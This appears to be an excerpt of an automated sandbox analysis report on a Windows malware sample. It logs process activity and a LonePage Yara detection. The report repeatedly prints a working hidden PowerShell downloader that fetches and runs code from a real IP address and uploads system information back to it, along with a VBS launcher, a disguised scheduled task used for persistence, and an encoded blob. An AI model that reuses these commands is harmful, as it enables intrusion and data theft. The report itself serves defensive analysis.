              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598577Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3389Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2674Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5378Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4336Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4298
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5470
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4068Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -13835058055282155s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -599562s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -599343s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -599234s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -599125s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -599015s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -598906s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -598797s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -598687s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -598577s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -598468s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7648Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7648Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412Thread sleep time: -22136092888451448s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598687Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598577Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598468Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
              Source: svchost.exe, 00000009.00000002.3747955096.0000027DA822B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3748521397.0000027DAD855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Encrypted powershell cmdline option found
              Source: unknownProcess created: Base64 decoded o+^j]jv.dim r, cset r = createobject("WScript.Shell")c = "powershell.exe -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}"r.Run c, 0, false
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /fJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='jvberi0xljqkjeljz9mncjegmcbvymokpdwgci9dcmvhdg9yichdyw5vbibpui1brfygnju1nsaguergkqovq3jlyxrpb25eyxrlicheojiwmjmwmjezmdg1otu3kzaxjzawjykkl1byb2r1y2vyichcmzc2xdm3n1wwmdbbxdawmgrcmdawb1wwmdbixdawmgvcmdawifwwmdbqxdawmfncmdawtfwwmdagxdawmdfcmdawllwwmdbccjncmdawzvwwmdagxdawmgzcmdawb1wwmdbyxdawmcbcmdawq1wwmdbhxdawmg5cmdawb1wwmdbuxdawmfwwmdapcj4+iaplbmrvymokmiawig9iago8pcakl1bhz2vzidmgmcbsiaovvhlwzsavq2f0ywxvzyakl091dhb1deludgvudhmgmtigmcbsiaovtwv0ywrhdgegmtmgmcbsiao+piakzw5kb2jqcjqgmcbvymokpdwgl1r5cgugl1hpymply3qgl1n1ynr5cgugl0ltywdlic9xawr0acaxmjqwic9izwlnahqgmtc1myavqml0c1blcknvbxbvbmvudca4iaovq29sb3jtcgfjzsavrgv2awnlr3jhesavrmlsdgvyifsgl0zsyxrlrgvjb2rlic9eq1rezwnvzgugxsavtgvuz3roidixodgxid4+iapzdhjlyw0ncngb3d13qfpx17haaqmwwpo2ahvbpraqqcpouukdiagbjggpqkruerexkkhiq3xfgyyaaiiatgqpgsqbpa5euusgoqcgiiagiorhyoa7970sqrtax/vp1z7dy7vrrhvuoeeed9n9v/sx4tonmdszhd4f9cfewp+ebgxbcprc1f6rr1fxlybaf90vhomefsohjxo+asyouwnszmey28ybzgmzad6gp+znm/fhhvidv7pzvx+mlzqvg517quh+bmdn7v3khhcnlyrubkv1d3vdwxpodtr09b9d3x8rphnw0yn+9/v0gyzg7ecgdf8lgbeift7sg/2n6r7pb337ffhr/wefg3wcfti+i3zqp2/fd/r1/fddftcmd6vpb30j/qz/+pk346d+nis2sp+3a4ktfj94bmdoaacukehfr8zmxlru68cgx3z51dbhxt+zmjlnrkxtbh/40w76diezjrootgx3jzmev8z1wrxk6bllk3xwrt8qshht5scgbx9s37fz124on4wxhhf5kcqah5+qmjscknr89blhxtnmc+cvxl5ynfda3vub+culpxfvld1/up7kafwzmtq65/unla3itvaozteslqbxuqqb/28nujo6ve2hbip8nuqocmsktwozlsvpbspuvcpq9eqtcjvoxmyunqwqocpvdufdgijslwtvetpkwfygutvmklxnmvwxvdvqekqztruebd5rwwipolq0vrkgffwviat+9xdrgc3siqoshao6a8ffundf1v2ypups6ua2hq/owmzhv2riw96hmarotivv1z/jmdxysbarpmfoozqrjtlqmvobnvvhep6gvkuueludhl0y301akwet6j/z1blqu6wnzw5k802yv5mvsxtqnn3indxkpuly23hwy6hxhzabqqasx9cm6izaqoj2ogqx8r5t+qjyvptdh8gmbghxcas6gvgfarll2fxlwl5mv2xxgygin93pk3xewlstomwj33qtymoph4vkmmzlht6irubisn/okrwlxrgoao537gbspttczik5srnvh8p8rm1nxkvayip4kiuvo/jf3ynrrkmoe3pejgpdt2eco74buirbtwwwglamjc22mg7inyoscnslmf01m/qubllbcmwq9ctybqxsakgms8drf8x3ejjv1vmuqkrtswpx926r+53+fthugevls08rlxhtfk6gf7sadm6pe1qvncccsnu5u6u2kv/czpsv5youm9v7hmhoc1hjcc9u1rorgntnkauvkjqcltpafieohjxkgegzmb2byorjmagyme2qhuwtn1nxcuzo+vpkfynojrkpgtzwtzrylf7yfmuozojacib63m5szhqtkgxhdf6nmg9rj9vibtlcfrjpelxayfbhiiqwnrlzxaxsdagepnlhwst3rgs4kmo3drnagm2lgfw8cici+6zatdq3wdidcvv0kn2yfugxpdzefohen4eumciwq7qbcmztuxptqwrrm6pqkvmmbxm64xk0vn1r8muqrqa8owtytw/cee1zxestrb7ev2bbitbdlo8gmztyacncgq3ghfhvflcuc53wyskqqpjzibasdrnc54oeczzbrahlcqxqlicgcd6lpt2gze2z713ccnj7p3k+pey1u8xicnmod3mxqgjec9jvbeyyiblgn4akzatmnf7zodupcvxnojem6ib7psszykpweerfxo7s5xmedhn1jviadp33bpdkbtk5ccllh6sgibhn1tjdgnmljjfuqh+frz1slejcbyqglrs3h6nhyu+5ypfq2mpl3b3q6b3etiwda06ijubjnwvclfvz4biopft2krlvqnpr+0z6u2lykiclgzuzyp4gdpds4isbuc2appum6olwxxty+wgwc7neb2d7ikxpllumknmdvw/5g4ifozd85pi4vdh7javcct7vwigwxnkzd+/w6kpsm3gj//iybatgtho2heqrxm2wzyjx4qvz0ygigle5i07sgqnwuwmgiftjwevfdaaq9ukq6tif+3vsukp/gnnifwptozpipuu/scdxibj8y+hklsjahv05q9v6buc8ptnz//qbon/cpz90lqv0wnzbhfablsqqk0f4mjrxkfhjagqxkw
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected LonePage
              Source: Yara matchFile source: 00000010.00000002.4545241066.00000107F6460000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4358131758.00000245D7680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4358131758.00000245D7686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4358131758.00000245D76C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3475796002.000001DE79AE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2066672979.0000026B63953000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2085530098.0000018899B05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.4358273831.00000245D7825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2085268300.000001889994C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2066672979.0000026B639B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
